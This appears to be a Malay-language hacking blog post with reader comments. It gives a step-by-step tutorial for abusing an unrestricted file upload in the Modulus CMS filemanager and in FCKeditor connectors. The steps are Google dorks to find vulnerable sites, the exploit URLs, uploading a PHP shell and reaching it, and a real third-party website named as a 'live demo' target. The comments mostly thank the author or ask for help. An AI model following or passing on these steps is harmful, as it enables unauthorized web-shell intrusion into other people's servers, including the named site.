1. Mula2 google dork :
- “Powered by Modulus”
- inurl:filemanager/libraries/
2. Seterusnya pilih salah satu web.
Exploit :
http://localhost/modules/filemanager/libraries/filemanager/filemanager.php
or
http://localhost/modules/fckeditor/libraries/fckeditor/editor/filemanager/connectors/uploadtest.html
3. Paparan dia lebih kurang macam ni :
Next click butang UPLOAD.Rujuk gambar :
Kemudian akan keluar macam ni :
Click Choose File dan UPLOAD!
Allowed File : php, html, asp, php4, txt, jpg, and more
4. Untuk tengok hasil :
4. Untuk tengok hasil :
or
http://localhost/home/2/shell.php
5.DONE!
Live demo :
http://lakesidedairy.com/modules/filemanager/libraries/filemanager/filemanager.php
Ok semoga berjaya.Assalamualaikum.
Ok semoga berjaya.Assalamualaikum.
nice share bro
ReplyDeleteError while saving *****.php :/
ReplyDeleteThis site is running TeamViewer.
ReplyDeleteFree Port 80 for other applications in advanced settings.
kenapa jadi macam nie.. kurang paham la..mintak tunjuk ajar lagi.=)
ni mcm jeniz fckeditor je ni :3
ReplyDeleteadik beradik dia.haha
ReplyDeleteIni artikel saya yang buat, tak de ikak cantumkan nama awak di sini -_-
ReplyDeleteIni saya ambil dari binus hacker.tetapi saya tulis lain.
ReplyDelete